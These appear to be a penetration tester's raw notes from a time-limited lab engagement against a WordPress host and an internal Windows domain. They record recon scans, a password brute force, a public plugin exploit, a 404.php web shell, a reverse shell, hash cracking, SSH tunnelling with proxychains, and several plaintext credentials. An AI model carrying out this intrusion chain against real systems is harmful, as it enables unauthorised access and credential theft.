------------------
NOTES
------------------
my ip = 108.2.122.253
first IP = 3.225.170.242

No DDOS
48 hrs from 12pm Monday for the test, 24 more hrs for the report
Use script, document process


------------------
NOTES
------------------
Nmap inital
	only 22 and 80, wordpress plugins is the way in

Wordpress site up
	User named dennis

	registration
		email = joshmerrill@duck.com
		pop:85n0Nbto8NhU

	Mention of hackers and using old plugins
	wpscan
		WP version 4.1 (out of date)
		theme = twentyfifteen (vuln)
		plugins
			download-manager (old) 2.7.84
				likely vuln

	Preforming a bruteforce password attack to get into admin -> from there hit the plugins


Gobuster
	basic dirs
	/wp-content           (Status: 301) [Size: 319] [--> http://3.225.170.242/wp-content/]
	/wordpress            (Status: 301) [Size: 318] [--> http://3.225.170.242/wordpress/]
	/wp-includes          (Status: 301) [Size: 320] [--> http://3.225.170.242/wp-includes/]
	/wp-admin             (Status: 301) [Size: 317] [--> http://3.225.170.242/wp-admin/]



INTIAL ACCESS TO THE ADMIN PAGE
	OOD software (gangi)
	exploit.py (no mod needed)
	https://www.exploit-db.com/exploits/35533

	QKi5Ko:3IZ73E


Initial RCE on box :)
	on admin page can update the 404.php


cant mess up firewall sadly :(

using web shell for rce instead of rev shell
forwarded traffic from router to my machine and got rev shell !!


first.kl
------------
no users?
	jk tons in the home dir
	nothing in any of the home dirs

in wp-config.php can get the mysql user:pass
	root:password
in mysql database
	found users hashes
		saved as hashes in kl directory
md5 hashes, can crach w hashcat
all work to ssh into box

Root hash not cracked

CentOS release 6.6 (Final)
LSB_VERSION=base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch
CentOS release 6.6 (Final)
CentOS release 6.6 (Final)




privesc to try
--------------
kernel version
lost+found in home
selinux


other hosts
------------
192.168.201.1
	Open ports



192.168.201.6 -- domain controller
	Open ports
		139, 445, 3389
		PORT      STATE SERVICE
		53/tcp    open  domain
		88/tcp    open  kerberos-sec
		135/tcp   open  msrpc
		139/tcp   open  netbios-ssn
		389/tcp   open  ldap
		445/tcp   open  microsoft-ds
		464/tcp   open  kpasswd5
		593/tcp   open  http-rpc-epmap
		636/tcp   open  ldapssl
		3268/tcp  open  globalcatLDAP
		3269/tcp  open  globalcatLDAPssl
		3389/tcp  open  ms-wbt-server
		49154/tcp open  unknown
		49156/tcp open  unknown
		49157/tcp open  unknown
		49158/tcp open  unknown
		49159/tcp open  unknown
		49165/tcp open  unknown

What to do now

	.6 is a windows machine, enumerate and kill
	Port 445
		SMB, can enumerate shares with anon or user/ pass gotten before?


domain name! pwn.local
	(nmap/windowsServices.nmap)


192.168.201.8
	Open ports
		22, 10000
				PORT     STATE  SERVICE
				21/tcp   closed ftp
				22/tcp   open   ssh
				23/tcp   closed telnet
				25/tcp   closed smtp
				80/tcp   closed http
				110/tcp  closed pop3
				139/tcp  closed netbios-ssn
				443/tcp  closed https
				445/tcp  closed microsoft-ds
				3389/tcp closed ms-wbt-server

192.168.201.13
	Open ports
		22, 8080, 9999
			PORT     STATE  SERVICE
			21/tcp   closed ftp
			22/tcp   open   ssh
			23/tcp   closed telnet
			25/tcp   closed smtp
			80/tcp   closed http
			110/tcp  closed pop3
			139/tcp  closed netbios-ssn
			443/tcp  closed https
			445/tcp  closed microsoft-ds
			3389/tcp closed ms-wbt-server


		port 9999
			vulnerable to command injection of the config editor
			https://www.exploit-db.com/exploits/48654

		port 8080
			most likely a production server, exposed api

ssh -R 127.0.0.1:80:192.168.201.12:80 pop@108.2.122.253
	forwarding traffic through the intermediary to the host + port of choice (192.168.201.12:80 here)
	how do find the services of the other hosts?

WHAT TO DO
	can proxy all traffic from me -> public ip -> private ip
	ssh -D 9050 tod@first.kl
	proxychains nmap -sT --top-ports=10 192.168.201.6

RDP ON MF DENNIS FOR DC
	this is so sad
		needs to be admin

Creds for srvcjenkins
srvcjenkins:j@&me=(1)
